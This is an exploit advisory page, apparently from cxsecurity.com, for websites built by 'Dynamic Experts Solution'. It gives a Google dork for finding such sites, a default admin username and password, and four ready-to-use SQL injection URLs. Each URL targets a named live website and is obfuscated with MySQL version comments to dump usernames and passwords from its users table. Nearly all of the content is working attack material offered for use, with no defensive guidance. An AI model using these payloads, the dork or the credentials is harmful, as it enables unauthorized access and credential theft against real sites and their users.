Dynamic Experts Solution Design Default Admin Password

2020.06.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### Exploit Title : Dynamic Experts Solution Design Default Admin Password Exploit Author : Behrouz Mansoori Vendor Homepage : https://dynamicxperts.com Google Dork : "Designed & Developed By : Dynamic Experts Solution" Date: 2020-06-29 Tested On : Win 10 / Mozilla Firefox ###################### # # username : admin # password : Admin123 # ###################### # demo 1 : username: https://hafeezasports.com/pages.php?id=-4%20/*!12345uNion*/%20/*!12345selEct*/%201,2,3,4,5,6,7,8,9,username,11,12,13,14%20/*!12345from*/%20%20users-- password: https://hafeezasports.com/pages.php?id=-4%20/*!12345uNion*/%20/*!12345selEct*/%201,2,3,4,5,6,7,8,9,password,11,12,13,14%20/*!12345from*/%20%20users-- # demo 2 : username & password: https://www.zeetexpro.com.pk/contact.php?id=-5%20/*!50000UNION*/%20/*!50000SELECT*/%201111,2222,3333,4444,/*!50000group_concat(username,0x3a,password,0x3c62723e)*/,6,7,8,9,10,11,12,13,14/*!50000from*/%20users--# # demo 3 : username & password: https://argos.com.pk/product_detail.php?proid=-877%27%20/*!12345UNION*/%20/*!12345SELECT*/%201,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20/*!12345from*/%20users--+ # demo 4 : username : https://www.roshansports.pk/pages.php?id=-2%20/*!12345unioN*/%20/*!12345sElect*/%201,2,3,4,5,6,7,8,9,username,11,12,13,14%20/*!12345froM*/%20users-- password: https://www.roshansports.pk/pages.php?id=-2%20/*!12345unioN*/%20/*!12345sElect*/%201,2,3,4,5,6,7,8,9,password,11,12,13,14%20/*!12345froM*/%20users-- ###################### # discovered by : behrouz mansoori ######################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top